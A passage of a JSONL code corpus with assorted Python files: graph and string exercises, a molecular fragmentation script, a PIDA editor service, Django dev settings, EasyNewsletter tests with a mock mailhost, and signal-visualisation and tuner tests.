otherwise add new ancestor to the back of ancs.\n ancs.insert(0, lineage) if len(lineage) > len(\n ancs[0]) else ancs.append(lineage)\n # Recursively call earliest_ancestor() on the new ancestor\n earliest_ancestor(data, data[i][0], ancs)\n # Return the earliest ancestor from ancs (the ancestor represented by the longest list). Return lowest id if tied. If len(ancs) is not greater than 1, that means the provided id has no parents: return -1. The following code takes advantage of the fact that ancs is partially sorted such that the earliest ancestor (or one which is tied) is in the front of ancs.\n return min([x[-1] for x in ancs if len(\n x) == len(ancs[0])]) if len(ancs) > 1 else -1\n","sub_path":"projects/ancestor/ancestor.py","file_name":"ancestor.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"233535516","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport time\nimport os\n\nclass ExtractExamplesBasedOnWordCount:\n\n def extractExamplesBasedOnWordCount(numberWords):\n space_id = os.environ.get('SPACE_ID')\n directory = './input/' + space_id + '/'\n\n # Loop round each filename in directory\n for filename in os.listdir(directory):\n space_count = 0\n intent = os.path.splitext(filename)[0]\n with open(directory + filename, 'r') as file:\n for line in file: \n print(line)\n f = open(directory + numberWords + '.txt', 'a+') \n space_count = line.count(' ')\n print(space_count)\n if space_count == numberWords-1:\n f.write(line)\n f.close()\n\n# if __name__== \"__main__\":\n# main()s\n\nExtractExamplesBasedOnWordCount(1)\n","sub_path":"extractwordsmatchingcount.py","file_name":"extractwordsmatchingcount.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"319782515","text":"import sys\nimport os\nfrom sys import argv\nimport xml.etree.ElementTree as ET\nfrom shutil import copyfile\nimport sys\nimport copy\nimport pickle\nimport numpy as np\nfrom numba import jit\n\n'''\nAdd a pre-screening for overlap of fragments so you don't bother checking so many. Make it an atom property so that smaller pieces are inherently faster.\n'''\n\n\nscript, system_name, eta, scratchdir = argv\n\nsrc_file = system_name+\".cml\"\n\nclass element:\n def __init__(self, cov1, cov2, cov3):\n self.c1 = cov1\n self.c2 = cov2\n self.c3 = cov3\n\nH = element(.32, -100, -100)\nHe = element(.46, -100, -100)\nLi = element(1.33,1.24,-100)\nBe = element(1.02,.90,.85)\nB = element(.85,.78,.73)\nC = element(.75,.67,.60)\nN = element(.71,.60,.54)\nO = element(.63,.57,.53)\nF = element(.57,.64,.59)\nNe = element(.58,.67,.96)\nNa = element(1.66,1.55,1.60)\nMg = element(1.41,1.39,1.32)\nAl = element(1.21,1.26,1.13)\nSi = element(1.11,1.16,1.07)\nP = element(1.07,1.11,1.02)\nS = element(1.05,1.03,.94)\nCl = element(1.02,.99,.95)\nAr = element(1.06,.96,.107)\nK = element(2.03,1.96,1.93)\nCa = element(1.76,1.71,1.47)\nSc = element(1.48,1.16,1.14)\nTi = element(1.36,1.17,1.08)\nV = element(1.34,1.12,1.06)\nCr = element(1.39,1.22,1.11)\nMn = element(1.19,1.05,1.03)\nFe = element(1.16,1.09,1.02)\nCo = element(1.11,1.03,.96)\nNi = element(1.10,1.01,1.01)\nCu = element(1.12,1.115,1.2)\nZn = element(1.18,1.2,-100)\nGa = element(1.24,1.17,1.21)\nGe = element(1.21,1.11,1.14)\nAs = element(1.21,1.14,1.06)\nSe = element(1.16,1.07,1.07)\nBr = element(1.2,1.14,1.09)\nKr = element(1.17,1.21,1.08)\nRb = element(2.1,2.02,-100)\nSr = element(.185,.157,.139)\nY = element(.163,.130,.124)\nZr = element(1.54,1.27,1.21)\nNb = element(1.47,1.25,1.16)\nMo = element(1.38,1.21,1.13)\nTc = element(1.28,1.2,1.1)\nRu = element(1.25,1.14,1.03)\nRh = element(1.25,1.1,1.06)\nPd = element(1.2,1.17,1.12)\nAg = element(1.28,1.39,1.37)\nCd = element(1.36,1.44,-100)\nIn = element(1.42,1.36,1.46)\nSn = element(1.4,1.3,1.32)\n\ntree = ET.parse(src_file)\nroot = tree.getroot()\n\nclass unit:\n def __init__(self, atom_list):\n self.atom_list = atom_list\n\n\n#tail = staying atom, tip = leaving atom (these are atom objects)\nclass disconnect_vector:\n def __init__(self, tail, tip):\n self.tail = tail\n self.tip = tip\n self.cart_tail = np.asarray([float(root[0][tail.no].attrib['x3']),float(root[0][tail.no].attrib['y3']),float(root[0][tail.no].attrib['z3'])])\n self.cart_tip = np.asarray([float(root[0][tip.no].attrib['x3']),float(root[0][tip.no].attrib['y3']),float(root[0][tip.no].attrib['z3'])])\n self.real_vec = self.cart_tip - self.cart_tail\n self.real_dist = np.linalg.norm(self.real_vec)\n self.radial_factor = self.real_dist/(tail.cov+tip.cov)\n self.conversion_factor = self.radial_factor*(tail.cov+.32)/(tail.cov+tip.cov)\n self.new_vec = self.conversion_factor*self.real_vec\n\n\nclass atom:\n def __init__(self, number, unit_obj):\n self.unit = unit_obj\n self.no = number\n self.cov = eval(root[0][number].attrib['elementType']).c1\n self.bond_list = []\n for atom_no in range(0, len(root[0])):\n if atom_no != self.no and bmat[atom_no][number]!= 0:\n self.bond_list.append(atom_no)\n\ndef Local_Units(unit_i):\n locals = set([])\n for atom_i in unit_i.atom_list:\n for atom_j in range(0, len(root[0])):\n if bmat[atom_i][atom_j] != 0 and atom_j not in unit_i.atom_list:\n locals.add(atoms[atom_j].unit)\n return locals\n\ndef Collect_Vectors(atom_list):\n vectors = []\n for atom_i in atom_list:\n for atom_j in atoms:\n if atom_j.no not in atom_list and bmat[atom_i][atom_j.no]!=0:\n vectors.append(disconnect_vector(atoms[atom_i], atom_j))\n return vectors\n\n\nclass fund_frag:\n def __init__(self, unit_obj):\n self.unit_list = set([unit_obj])\n for i in range(0, int(eta)):\n units_to_add = set([])\n for unit_i in self.unit_list:\n units_to_add = units_to_add.union(Local_Units(unit_i))\n self.unit_list = self.unit_list.union(units_to_add)\n self.atom_list = []\n for unit_l in self.unit_list:\n for atom_l in unit_l.atom_list:\n self.atom_list.append(atom_l)\n Done = False\n while Done == False:\n self.vectors = Collect_Vectors(self.atom_list)\n Done = True\n for vector in self.vectors:\n for vector2 in self.vectors:\n if vector != vector2 and vector.tip == vector2.tip:\n self.unit_list.add(vector.tip.unit)\n for atom_q in vector.tip.unit.atom_list:\n self.atom_list.append(atom_q)\n self.atom_list = set(self.atom_list)\n self.atom_list = list(self.atom_list)\n Done = False\n\ndef Compute_Overlap(f1, f2):\n return set(f1.atom_list).intersection(set(f2.atom_list))\n\n\nclass true_frag:\n def __init__(self, fund_list, order):\n self.order = order\n self.funds = set(fund_list)\n self.atom_list = []\n self.overlap = []\n self.frag_list = set([self])\n for atom_i in range(0, len(root[0])):\n Add = True\n for fund in self.funds:\n if atom_i not in fund.atom_list:\n Add = False\n if Add == True:\n self.atom_list.append(atom_i)\n self.vectors = []\n\n def Get_Vectors(self):\n self.vectors = Collect_Vectors(self.atom_list)\n\ndef Get_Fund_Frags(units):\n fund_frags = []\n for unit_i in units:\n fund_frags.append(fund_frag(unit_i))\n for frag in fund_frags:\n if frag!= fund_frags[-1] and set(fund_frags[-1].atom_list).issubset(set(frag.atom_list)):\n fund_frags.pop()\n return fund_frags\n\ndef Get_Bond_String(atom1, atom2, cml_filename):\n id1 = root[0][atom1].attrib[\"id\"]\n id2 = root[0][atom2].attrib[\"id\"]\n bond_string = str(id1)+\" \"+str(id2)\n return bond_string\n\ndef Initialize_Bond_Mat():\n bmat = []\n for atom1 in range(0, atom_count):\n bmat.append([])\n for atom2 in range(0, atom_count):\n bmat[atom1].append(0)\n return bmat\n\ndef Get_Bond_Mat(cml_filename):\n tree1 = copy.copy(tree)\n root1 = copy.copy(root)\n bmat = Initialize_Bond_Mat()\n for atom1 in range(0, atom_count):\n for atom2 in range(atom1, atom_count):\n for bond in root1[1]:\n bond_string = Get_Bond_String(atom1, atom2, cml_filename)\n bond_string_dos = Get_Bond_String(atom2, atom1, cml_filename)\n if bond_string == bond.attrib['atomRefs2'] or bond_string_dos == bond.attrib['atomRefs2']:\n bmat[atom1][atom2] = int(bond.attrib['order'])\n bmat[atom2][atom1] = int(bond.attrib['order'])\n return bmat\n\n#Units are the pre-primitive fragments which can never be separated, e.g. C=O, CH3, etc.)\ndef Find_Units():\n units = []\n unassigned = []\n for atom_i in range(0, len(root[0])):\n tmp_unit = [atom_i]\n Unassigned = True\n for unit_i in units:\n if atom_i in unit_i.atom_list:\n Unassigned = False\n break\n if Unassigned == True:\n Done = False\n while Done == False:\n Done = True\n append_list = []\n for atom_j in tmp_unit:\n for atom_k in range(0, len(root[0])):\n if atom_k not in tmp_unit and atom_k not in append_list:\n if bmat[atom_j][atom_k]>1 or (bmat[atom_j][atom_k]==1 and (root[0][atom_j].attrib['elementType']=='H' or root[0][atom_k].attrib['elementType']=='H')):\n append_list.append(atom_k)\n Done = False\n for atom_l in append_list:\n tmp_unit.append(atom_l)\n units.append(unit(tmp_unit))\n return units\n\ndef Make_Atoms(units):\n atoms = []\n for unit_i in units:\n for atom_i in unit_i.atom_list:\n atoms.append(atom(atom_i, unit_i))\n atoms.sort(key=lambda x: x.no)\n return atoms\n\ndef Cull(frag_list):\n clear = []\n for fragment in frag_list:\n for fragment2 in frag_list:\n if fragment!=fragment2 and set(fragment.atom_list) == set(fragment2.atom_list):\n clear.append(fragment)\n clear = set(clear)\n clear = list(clear)\n if clear != []:\n clear.pop()\n for fragment in clear:\n if fragment in frag_list:\n frag_list.remove(fragment)\n clear = []\n for fragment in frag_list:\n for fragment2 in frag_list:\n if fragment!=fragment2 and set(fragment.atom_list).issubset(set(fragment2.atom_list)):\n clear.append(fragment)\n for fragment in clear:\n if fragment in frag_list:\n frag_list.remove(fragment)\n return frag_list\n\ndef Get_True_Frags(fund_frags):\n frags = []\n for frag in fund_frags:\n frags.append(true_frag([frag],1))\n return frags\n\ndef InListFrags(frags, f1, f2, start):\n fundy = set(frags[f1].funds).union(set(frags[f2].funds))\n for fragment in range(start, len(frags)):\n if set(fundy) == set(frags[fragment].funds):\n return True\n return False\n\ndef Find_Frags(frags, order, new_frags):\n Done = True\n newer_frags = []\n for f1 in new_frags:\n for f2 in f1.overlap:\n Add = True\n if Compute_Overlap(f1, f2)==set([]):\n break\n blah = f1.funds.union(f2.funds)\n for f3 in newer_frags:\n if blah == f3.funds:\n Add = False\n if Add == True:\n blah2 = f1.frag_list.union(f2.frag_list)\n new_overlap = set(f1.overlap).intersection(set(f2.overlap))\n temp_frag = true_frag(blah, order)\n frags.append(temp_frag)\n newer_frags.append(temp_frag)\n frags[-1].frag_list = (blah2)\n frags[-1].overlap = new_overlap\n newer_frags[-1].overlap = new_overlap\n newer_frags[-1].frag_list = (blah2)\n Done = False\n print(order)\n print(len(frags))\n if Done == False:\n Find_Frags(frags, order+1, newer_frags)\n return frags\n\ndef Get_Overlaps(fragment, frags):\n for frag2 in frags:\n Add = False\n for atom2 in frag2.atom_list:\n if frag2 != fragment and atom2 in fragment.atom_list:\n fragment.overlap.append(frag2)\n break\n return set(fragment.overlap)\n\natom_count = len(root[0])\nbmat = Get_Bond_Mat(src_file)\nunits = Find_Units()\nfirst_order_frags = []\natoms = Make_Atoms(units)\nfund_frags = Get_Fund_Frags(units)\nfund_frags = Cull(fund_frags)\nfrags = Get_True_Frags(fund_frags)\nfor fragment in frags:\n fragment.overlap = Get_Overlaps(fragment, frags)\nstop = len(frags)\nFind_Frags(frags, 2, copy.copy(frags))\nfor frag in frags:\n print (frag.order)\n print (frag.atom_list)\n","sub_path":"frag_prog_delta.py","file_name":"frag_prog_delta.py","file_ext":"py","file_size_in_byte":11182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"260511549","text":"# -*- coding: utf-8 -*- \n\n# vim:set shiftwidth=4 tabstop=4 expandtab textwidth=79:\n#Copyright (c) 2005 Ali Afshar aafshar@gmail.com\n\n#Permission is hereby granted, free of charge, to any person obtaining a copy\n#of this software and associated documentation files (the \"Software\"), to deal\n#in the Software without restriction, including without limitation the rights\n#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n#copies of the Software, and to permit persons to whom the Software is\n#furnished to do so, subject to the following conditions:\n\n#The above copyright notice and this permission notice shall be included in\n#all copies or substantial portions of the Software.\n\n#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n#SOFTWARE.\nimport gtk\nimport pida.core.service as service\nimport pida.core.document as document\nfrom pida.core import actions\n\ntypes = service.types\ndefs = service.definitions\n\nimport glob\nimport sre\n\nclass document_type_handler(service.service):\n\n class fallback_handler(defs.document_handler):\n \"\"\"The fallback buffer creator.\"\"\"\n\n globs = None\n\n def create_document(self, filename, document_type=None, **kw):\n if document_type is None:\n document_type = document.realfile_document\n doc = document_type(filename=filename,\n handler=self, **kw)\n return doc\n\n def view_document(self, document):\n self.service.get_service('editormanager').call('edit',\n filename=document.filename)\n\n def close_document(self, document):\n self.service.boss.call_command('editormanager', 'close',\n filename=document.filename)\n\n @actions.action(stock_id=gtk.STOCK_REDO, label=None)\n def act_redo(self, action):\n \"\"\"Redo the undone action\"\"\"\n self.service.boss.call_command('editormanager', 'redo')\n\n @actions.action(stock_id=gtk.STOCK_UNDO, label=None, is_important=True)\n def act_undo(self, action):\n \"\"\"Undo the last action\"\"\"\n self.service.boss.call_command('editormanager', 'undo')\n\n @actions.action(stock_id=gtk.STOCK_CUT, label=None)\n def act_cut(self, action):\n \"\"\"Cut the selection\"\"\"\n self.service.boss.call_command('editormanager', 'cut')\n\n @actions.action(stock_id=gtk.STOCK_COPY, label=None)\n def act_copy(self, action):\n \"\"\"Copy the selection\"\"\"\n self.service.boss.call_command('editormanager', 'copy')\n\n @actions.action(stock_id=gtk.STOCK_PASTE, label=None)\n def act_paste(self, action):\n \"\"\"Paste the clipboard\"\"\"\n self.service.boss.call_command('editormanager', 'paste')\n\n @actions.action(stock_id=gtk.STOCK_SAVE,\n label=None,\n is_important=True,\n name=\"DocumentSave\")\n def act_save(self, action):\n \"\"\"Save the document\"\"\"\n self.service.boss.call_command('editormanager', 'save')\n\n @actions.action(stock_id=gtk.STOCK_REVERT_TO_SAVED, label=None)\n def act_revert(self, action):\n \"\"\"Reverts a document\"\"\"\n self.service.boss.call_command('editormanager', 'revert')\n\n def get_menu_definition(self):\n return \"\"\"\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \"\"\"\n\n def init(self):\n self.__files = {}\n self.__file_fallback = None\n self.__action_groups = {}\n\n def cmd_register_file_handler(self, handler):\n \"\"\"Register buffer handler\"\"\"\n if handler.globs is None:\n self.__file_fallback = handler(self)\n else:\n self.__register_patterns(self.__files, handler)\n\n def cmd_create_document(self, filename, document_type=None, **kw):\n handler = (self.__get_file_handler(filename) or\n self.__file_fallback)\n doc = handler.create_document(filename, document_type, **kw)\n handler.view_document(doc)\n if handler not in self.__action_groups:\n self.boss.call_command('window', 'register_action_group',\n actiongroup=handler.action_group,\n uidefinition=handler.get_menu_definition())\n self.__action_groups[handler] = handler.action_group\n handler.action_group.set_visible(False)\n return doc\n\n def cmd_get_document_actions(self):\n return self.__file_fallback.action_group.list_actions()\n\n def cmd_disable_document_accelerators(self):\n for act in self.__file_fallback.action_group.list_actions():\n gtk.accel_map_change_entry(act.accel_path, 0, 0, True)\n\n def __register_patterns(self, handlers, handler, attrname='globs'):\n patterns = getattr(handler, attrname, [])\n for glob_pattern in patterns:\n re_pattern = glob.fnmatch.translate(glob_pattern)\n pattern = sre.compile(re_pattern)\n handlers[pattern] = handler(handler.service)\n \n def __get_file_handler(self, filename):\n if filename is None:\n return False\n for pattern in self.__files:\n if pattern.match(filename):\n return self.__files[pattern]\n\nService = document_type_handler\n","sub_path":"tags/release-0.3.1/trunk/pida/services/documenttypes.py","file_name":"documenttypes.py","file_ext":"py","file_size_in_byte":8052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"97156099","text":"# 2021 04 14 14:15 ~ 30\n# 다익스트라. graph, distance - 최대인 것의 갯수\nimport heapq\nimport sys\ninput = sys.stdin.readline\nINF = (1e9)\n\ndef dijstra(start):\n q = []\n \n heapq.heappush(q, (0, start))\n distance[start] = 0\n \n while q:\n dist, now = heapq.heappop(q)\n if distance[now] < dist:\n continue\n for i in graph[now]:\n cost = dist + i[1]\n if cost < distance[i[0]]:\n distance[i[0]] = cost\n heapq.heappush(q, (cost, i[0]))\n \n\ndef solution(n, edge):\n answer = 0\n global graph\n global distance\n graph = [[] for i in range(n+1)]\n distance = [INF] * (n+1)\n \n for value in edge:\n a, b = value\n graph[a].append((b, 1))\n graph[b].append((a, 1))\n \n start = 1\n dijstra(start)\n \n # print(distance)\n \n maxValue = 0\n for i in distance:\n if i != INF and maxValue < i:\n maxValue = i\n \n print(\"maxValue:\", maxValue)\n answer = distance.count(maxValue)\n \n return answer","sub_path":"그래프/[다익스트라]가장먼노드.py","file_name":"[다익스트라]가장먼노드.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"271458412","text":"tests = int(input())\nvowels = ('a', 'e', 'i', 'o', 'u')\nfor i in range(tests):\n lower = 0\n upper = 0\n string = input()\n for j in vowels:\n if j in string:\n lower += 1\n if j.upper() in string:\n upper += 1\n if lower == 5 or upper == 5:\n print('lovely string')\n else:\n print('ugly string')\n\n\n","sub_path":"StringP1.py","file_name":"StringP1.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"245920779","text":"\n# #迭代器示例\n# L = [2, 3, 5, 7]\n# it = iter(L) #用iter返回一个迭代器用it绑定\n# next(it) # 2\n# next(it) # 3\n# next(it) # 5\n# next(it) # 7\n# next(it) # StopIteration #通知next调用者,已无数据\n\n\n# # exercise 1\n# s = {'工商银行', '建设银行', '中国银行', '农业银行'}\n\n# # #1\n# # for x in s:\n# # print(x)\n\n# #2\n# s_it = iter(s)\n# while True:\n# try:\n# x = next(s_it)\n# print(x)\n# except StopIteration:\n# break\n\n\n# # yield 示例\n# def myyield():\n# yield 2\n# yield 2 + 1\n# yield 5\n# yield 7\n# print('生成器函数调用结束')\n\n# gen = myyield()\n# it = iter(gen)\n# print(next(it))\n# print(next(it))\n# print(next(it))\n# print(next(it))\n# # print(next(it))\n\n# excercise 2\ndef my_enum():\n L = []\n while True:\n s = input('input:')\n if not s:\n break\n L.append(s)\n for t in enumerate(L, 1):\n print('第%d行:%s' % t)\n\nmy_enum()","sub_path":"pbase/day15/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"403557254","text":"from .base import *\n\nDEBUG = True\nALLOWED_HOSTS = [\"*\"]\n\nemail_backend = env(\"EMAIL_BACKEND\", \"file\")\nif email_backend == \"file\":\n EMAIL_BACKEND = 'django.core.mail.backends.filebased.EmailBackend'\n EMAIL_FILE_PATH = './emails'\n os.makedirs(\"./emails\", exist_ok=True)\n\nGEOIP_PATH = os.path.abspath(os.path.join(BASE_DIR, \"../../resources/geolite\"))\n","sub_path":"server/src/server/settings/development.py","file_name":"development.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"278799227","text":"# -*- coding: utf-8 -*-\nfrom Acquisition import aq_base\nfrom plone.app.testing import TEST_USER_ID, setRoles\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFPlone.tests.utils import MockMailHost\nfrom Products.EasyNewsletter.interfaces import IENLIssue\nfrom Products.EasyNewsletter.testing import EASYNEWSLETTER_INTEGRATION_TESTING\nfrom Products.MailHost.interfaces import IMailHost\nfrom zExceptions import BadRequest\nfrom zope.component import getMultiAdapter\nfrom zope.component import getSiteManager\n\nimport unittest2 as unittest\n\n\nclass DailyIssueBaseTestCase(unittest.TestCase):\n \"\"\"Test case sending a daily Newsletter issue\"\"\"\n\n layer = EASYNEWSLETTER_INTEGRATION_TESTING\n\n def setUp(self):\n self.portal = self.layer[\"portal\"]\n self.catalog = getToolByName(self.portal, \"portal_catalog\")\n setRoles(self.portal, TEST_USER_ID, [\"Manager\"])\n\n #creating test objects: folder, news, newsletter and subscriber\n self.portal.invokeFactory(\"Folder\", \"testfolder\")\n self.folder = self.portal[\"testfolder\"]\n self.folder.invokeFactory(\"News Item\", \"news01\")\n\n self.folder.invokeFactory(\"EasyNewsletter\", \"daily-news\")\n self.newsletter = self.folder[\"daily-news\"]\n self.newsletter.setTitle(\"Daily News\")\n\n criteria = self.newsletter.addCriterion(\n \"portal_type\",\n \"ATSimpleStringCriterion\"\n )\n criteria.setValue(\"News Item\")\n\n self.newsletter.invokeFactory(\"ENLSubscriber\", \"subscriber01\")\n self.view = getMultiAdapter(\n (self.newsletter, self.layer[\"request\"]),\n name=\"daily-issue\"\n )\n\n #setting a Mock mailhost\n self.portal._original_MailHost = self.portal.MailHost\n self.portal.MailHost = mailhost = MockMailHost(\"MailHost\")\n sm = getSiteManager(context=self.portal)\n sm.unregisterUtility(provided=IMailHost)\n sm.registerUtility(mailhost, provided=IMailHost)\n\n self.portal.email_from_address = \"noreply@plone.org\"\n\n def tearDown(self):\n self.portal.MailHost = self.portal._original_MailHost\n sm = getSiteManager(context=self.portal)\n sm.unregisterUtility(provided=IMailHost)\n sm.registerUtility(\n aq_base(self.portal._original_MailHost),\n provided=IMailHost\n )\n\n\nclass DailyIssueContent(DailyIssueBaseTestCase):\n def test_create_new_issue(self):\n issues = self.catalog(\n object_provides=IENLIssue.__identifier__,\n path=\"/\".join(self.newsletter.getPhysicalPath())\n )\n self.assertEqual(len(issues), 0)\n self.assertFalse(self.view.already_sent())\n try:\n self.view.create_issue()\n except Exception:\n self.fail(\"Couldn't create an issue!\")\n\n issues = self.catalog(\n object_provides=IENLIssue.__identifier__,\n path=\"/\".join(self.newsletter.getPhysicalPath())\n )\n\n self.assertTrue(self.view.already_sent())\n self.assertEqual(len(issues), 1)\n self.assertEqual(self.view.issue.Title(), \"Daily News\")\n\n def test_empty_issue(self):\n self.assertTrue(self.view.has_content())\n self.folder.manage_delObjects([\"news01\"])\n self.assertFalse(self.view.has_content())\n\n def test_send_issue(self):\n try:\n self.view.create_issue()\n except Exception:\n self.fail(\"Couldn't create issue!\")\n\n self.view.send()\n self.assertEqual(len(self.portal.MailHost.messages), 1)\n\n\nclass DailyIssueMethodGET(DailyIssueBaseTestCase):\n\n def setUp(self):\n self.layer[\"request\"][\"REQUEST_METHOD\"] = \"GET\"\n DailyIssueBaseTestCase.setUp(self)\n\n def test_get_with_an_empty_issue(self):\n self.folder.manage_delObjects([\"news01\"])\n self.view()\n self.assertEqual(self.view.request.response.getStatus(), 204)\n\n def test_get_with_a_non_empty_issue(self):\n self.view()\n self.assertEqual(self.view.request.response.getStatus(), 100)\n\n def test_get_an_alredy_sent_issue(self):\n self.view.create_issue()\n self.view()\n self.assertEqual(self.view.request.response.getStatus(), 200)\n\n\nclass DailyIssueMethodPOST(DailyIssueBaseTestCase):\n\n def setUp(self):\n self.layer[\"request\"][\"REQUEST_METHOD\"] = \"POST\"\n DailyIssueBaseTestCase.setUp(self)\n\n def test_do_not_create_or_send_an_empty_issue(self):\n self.folder.manage_delObjects([\"news01\"])\n self.view()\n issues = self.catalog(\n object_provides=IENLIssue.__identifier__,\n path=\"/\".join(self.newsletter.getPhysicalPath())\n )\n self.assertFalse(issues)\n self.assertEqual(self.view.request.response.getStatus(), 204)\n self.assertEqual(len(self.portal.MailHost.messages), 0)\n\n def test_send_issue_and_check_http_status(self):\n self.view()\n self.assertEqual(self.view.request.response.getStatus(), 200)\n self.assertEqual(len(self.portal.MailHost.messages), 1)\n\n def test_do_not_send_same_issue_twice(self):\n self.view() # 200 OK\n self.assertEqual(self.view.request.response.getStatus(), 200)\n self.assertRaises(BadRequest, self.view.create_issue)\n self.view() # 409 Already Sent\n self.assertEqual(self.view.request.response.getStatus(), 409)\n\n\nclass DailyIssueMethodOtherThanGETorPOST(DailyIssueBaseTestCase):\n\n def setUp(self):\n self.layer[\"request\"][\"REQUEST_METHOD\"] = \"FOOBAR\"\n DailyIssueBaseTestCase.setUp(self)\n\n def test_trying_another_method_on_view(self):\n self.view()\n self.assertEqual(self.view.request.response.getStatus(), 405)\n self.assertEqual(\n self.view.request.response.getHeader(\"Allow\"),\n \"GET, POST\"\n )\n\n\ndef test_suite():\n return unittest.defaultTestLoader.loadTestsFromName(__name__)\n","sub_path":"Products/EasyNewsletter/tests/test_daily_issue.py","file_name":"test_daily_issue.py","file_ext":"py","file_size_in_byte":5914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"123618985","text":"import h5py\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\nSIGNALS_NAME = [\n \"AbdoBelt\",\n \"AirFlow\",\n \"PPG\",\n \"ThorBelt\",\n \"Snoring\",\n \"SPO2\",\n \"C4A1\",\n \"O2A1\",\n]\n\n\ndef extract_events_from_binary_mask(binary_mask, fs=1):\n binary_mask = np.array([0] + binary_mask.tolist() + [0])\n diff_data = np.diff(binary_mask)\n starts = np.where(diff_data == 1)[0] / fs\n ends = np.where(diff_data == -1)[0] / fs\n\n assert len(starts) == len(ends)\n events = []\n for i, _ in enumerate(starts):\n events += [(starts[i], ends[i])]\n\n return events\n\n\ndef visualize_signal_and_event(X, mask, signals_name=SIGNALS_NAME, signal_freq=100):\n n_signal = X.shape[0]\n fig, axs = plt.subplots(n_signal, sharex=True)\n events = extract_events_from_binary_mask(mask)\n for i in range(n_signal):\n axs[i].plot(np.arange(0, X[i].shape[0]) / signal_freq, X[i])\n axs[i].set_ylabel(signals_name[i])\n for elt in events:\n axs[i].axvspan(elt[0], elt[1], color='red', alpha=0.3)\n plt.xlim(0, X[0].shape[0]/ signal_freq)\n plt.show()\n\n\ndef visualise_index(idx, data_h5, masks, N_signals=8):\n x = data_h5['data'][idx, 2:]\n x = x.reshape(N_signals, -1)\n visualize_signal_and_event(x, np.array(masks[idx, 1:]))\n\n\nif __name__ == \"__main__\":\n import h5py\n PATH_TO_TRAINING_DATA = \"\"\n PATH_TO_TRAINING_TARGET = \"\"\n h5_file = h5py.File(PATH_TO_TRAINING_DATA)\n mask = np.array(pd.read_csv(PATH_TO_TRAINING_TARGET))\n visualise_index(0, h5_file, mask)\n","sub_path":"Dreem_functions/visualisation.py","file_name":"visualisation.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"417413671","text":"from selftf.lib.tuner import PSTunerTrainingData, PSTunerConfiguration, GPTrainingModel, TensorFlowConfigurationManager, \\\n TFConfigUtil\nimport logging\nimport unittest\n\n\nclass TestTuner(unittest.TestCase):\n def test_gp(self):\n c1 = PSTunerConfiguration(\n num_ps=2,\n num_worker=2,\n inter_op_parallelism_threads=8,\n intra_op_parallelism_threads=8\n )\n c2 = PSTunerConfiguration(\n num_ps=1,\n num_worker=3,\n inter_op_parallelism_threads=14,\n intra_op_parallelism_threads=2\n )\n c3 = PSTunerConfiguration(\n num_ps=3,\n num_worker=1,\n inter_op_parallelism_threads=2,\n intra_op_parallelism_threads=14\n )\n d1 = PSTunerTrainingData(\n ps_config=c1,\n elapsed_time_in_ms=1,\n loss=0.3,\n step=1\n )\n d2 = PSTunerTrainingData(\n ps_config=c2,\n elapsed_time_in_ms=2,\n loss=0.2,\n step=2\n )\n d3 = PSTunerTrainingData(\n ps_config=c3,\n elapsed_time_in_ms=3,\n loss=0.2,\n step=3\n )\n\n list_training_data = [d1, d2, d3]\n\n tfcm = TensorFlowConfigurationManager(lambda: 4, lambda: 16, (0.00001, 0.0001), (1000, 10000))\n tcu = TFConfigUtil(tfcm)\n\n gp = GPTrainingModel(tcu)\n gp.train(list_training_data)\n\n config_obj = gp.get_best_config()\n\n print(str(config_obj))\n\n print(\"Finish\")\n\n def test_get_lastest_training_data_group_by_ps_config(self):\n c1 = PSTunerConfiguration(\n num_ps=2,\n num_worker=2,\n inter_op_parallelism_threads=8,\n intra_op_parallelism_threads=8\n )\n c2 = PSTunerConfiguration(\n num_ps=1,\n num_worker=3,\n inter_op_parallelism_threads=14,\n intra_op_parallelism_threads=2\n )\n d1 = PSTunerTrainingData(\n ps_config=c1,\n elapsed_time_in_ms=1,\n loss=0.3,\n step=1\n )\n d2 = PSTunerTrainingData(\n ps_config=c1,\n elapsed_time_in_ms=2,\n loss=0.2,\n step=2\n )\n d3 = PSTunerTrainingData(\n ps_config=c2,\n elapsed_time_in_ms=3,\n loss=0.2,\n step=3\n )\n d4 = PSTunerTrainingData(\n ps_config=c2,\n elapsed_time_in_ms=3,\n loss=0.2,\n step=4\n )\n d5 = PSTunerTrainingData(\n ps_config=c1,\n elapsed_time_in_ms=1,\n loss=0.3,\n step=5\n )\n d6 = 